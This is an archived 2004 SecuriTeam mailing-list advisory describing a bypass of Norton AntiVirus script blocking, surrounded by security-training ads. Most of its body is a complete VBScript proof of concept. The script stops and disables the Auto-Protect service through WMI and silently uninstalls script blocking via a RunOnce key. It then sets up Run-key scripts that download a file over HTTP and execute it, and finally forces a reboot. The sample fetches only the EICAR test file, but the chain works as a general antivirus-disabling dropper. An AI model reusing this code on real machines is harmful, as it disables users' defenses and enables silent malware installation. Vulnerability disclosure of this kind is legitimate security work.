Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] Norton Anti-Virus VB Scripting Vulnerability

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] Norton Anti-Virus VB Scripting Vulnerability
Date: 17 Nov 2004 16:05:46 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Norton Anti-Virus VB Scripting Vulnerability
------------------------------------------------------------------------


SUMMARY

Presented here is a method to bypass Norton Anti-Virus Script Blocking, 
and launch malicious contents undetected by the Anti-Virus.

DETAILS

The VB script presented below will run even with Norton AntiVirus Script 
Blocking enabled by using WMI. The script will  then disable the 
Auto-Protect Service and will disable Script Blocking, allowing malicious 
content to run undetected.

In a nutshell, here's what the proof of concept does:
On Reboot it sets:
1) The NAV Auto-Protect Service to DISABLED
2) A registry key to Uninstall Script Blocking
3) Creates, launches a VBScript file to d/l the EICAR AV 'test' virus
4) Launches the EICAR.COM test pattern a few seconds later
Note: This exploit works only if the user is logged in with Administrative 
privileges.

A flash movie demonstrating the proof of concept can be found at:  
<http://wired.s6n.com/files/jathias/navdemo.html> 
http://wired.s6n.com/files/jathias/navdemo.html
You'll see that Script Blocking gets uninstalled. As well, notice that 
Auto-Protect doesn't kick in until you click on the tray icon and launch 
the NAV console. By then, the 'Virus' had already launched quite some time 
before, as you can see in the cmd.exe window.

Proof of Concept Code:
The following code was tested under WinXP and a fully LiveUpdated NAV 2005 
using a broadband Internet connection.  Should be fine for Win2000 and NAV 
2004 as well.

' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----

sServer = "."
Set oWMI = GetObject("winmgmts://.")

sServiceName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " _
     & "Where displayname='" & sServiceName & "'"
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
    oService.StopService
    oService.ChangeStartMode("Disabled")
Next

' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ;) ----------

const HKEY_LOCAL_MACHINE = &H80000002

strComputer = "."

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Uninstall Norton Script Blocking"
arrStringValues = ("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Downloader"
arrStringValues = ("cmd /c ECHO Set
X=CreateObject("+chr(34)+"Microsoft.XMLHTTP"+chr(34)+"):X.open
"+chr(34)+"GET"+chr(34)+",("+chr(34)+"http://www.eicar.org/download/eicar.com"+chr(34)+"),False:X.send:set
Y=createobject("+chr(34)+"adodb.stream"+chr(34)+"):Y.type=1:Y.open:Y.write
X.responseBody:Y.savetofile("+chr(34)+"eicar.com"+chr(34)+"),2:Y.close >
estart.VBS")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Launcer"
arrStringValues = ("cmd /c ECHO wscript.sleep(10000):Set
Z=CreateObject("+chr(34)+"WSCript.Shell"+chr(34)+"):Z.run("+chr(34)+"cmd
/k eicar.com"+chr(34)+") > elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' -------- LAUNCH EICAR DOWNLOADER ----------

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Code DownLoader"
arrStringValues = ("estart.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' --------  RUN THE 'VIRUS' ----------

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Malicious Code Launcher"
arrStringValues = ("elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----

Set wmi    = GetObject("winmgmts:{(Shutdown)}")
set objset = wmi.instancesof("win32_operatingsystem")
  for each obj in objset
   set os = obj : exit for
  next
os.win32shutdown 2 + 4


ADDITIONAL INFORMATION

The information has been provided by  <mailto:dmilisic@myrealbox.com> 
Daniel Milisic.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] Norton Anti-Virus VB Scripting Vulnerability, SecuriTeam <=
Previous by Date:  [EXPL] Kerio Personal Firewall Multiple IP Options DoS PoC, SecuriTeam
Next by Date:  [TOOL] Msndump - MSN Messenger Sniffer, SecuriTeam
Previous by Thread:  [EXPL] Kerio Personal Firewall Multiple IP Options DoS PoC, SecuriTeam
Next by Thread:  [TOOL] Msndump - MSN Messenger Sniffer, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]